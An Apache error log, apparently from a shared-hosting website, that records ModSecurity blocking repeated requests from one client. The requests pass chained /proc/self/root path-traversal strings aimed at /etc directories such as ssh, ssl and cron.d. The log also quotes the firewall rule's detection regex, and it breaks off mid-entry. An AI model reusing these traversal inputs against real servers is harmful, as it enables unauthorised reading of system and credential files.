https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:21:49.515113 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.241.31:53236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMzQbLMZ6AikZjR9WCQAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:21:50.129804 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52210] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:21:51.447274 2026] [:error] [pid 20435:tid 140411658000128] [client 74.7.241.31:58492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxMz5JaM1-0uhhUQJM-0QAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:21:55.898818 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.241.31:58502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM07-FhjpZGs9ba8qQxwAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:21:58.946016 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:49770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM1gbLMZ6AikZjR9WCTQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:03.287906 2026] [:error] [pid 5816:tid 140411565680384] [client 74.7.241.31:49776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM25fmNfuxceSuAEK7xAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:07.911260 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:49784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM3_XLqtnMIWvjpaJFvwAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:13.560743 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:38316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM5RCii7xarUs8iHYQqwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:14.313813 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:22:16.043047 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:38322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM6Epm7ZmxKZTM4bZqRAAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:18.643573 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:51094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM6gbLMZ6AikZjR9WCaQAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:22.769073 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:51098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM7gbLMZ6AikZjR9WCbQAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:25.552247 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:51098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM8QbLMZ6AikZjR9WCcQAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:25.552787 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 74.7.241.31:51098] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:26.998244 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.241.31:51100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM8r-FhjpZGs9ba8qQ1QAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:30.292687 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.241.31:34182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM9gbLMZ6AikZjR9WCdwAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:34.387120 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:34190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM-v-YZRR_7pZ7nDKyLAAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:38.209883 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53260] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:22:38.463456 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:41542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxM_ta6ubjKNq_cu4Z7sAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:40.155584 2026] [:error] [pid 8307:tid 140411691570944] [client 74.7.241.31:41552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNAL-FhjpZGs9ba8qQ2QAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:41.792997 2026] [:error] [pid 7545:tid 140411725141760] [client 74.7.241.31:41564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNAX8B84UptSoTJtY1bwAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:43.193484 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:41580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNA0pm7ZmxKZTM4bZqUgAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:45.386423 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:41588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNBda6ubjKNq_cu4Z7sgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:46.995448 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:41600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNBv-YZRR_7pZ7nDKyNQAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:22:48.180172 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:34836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] 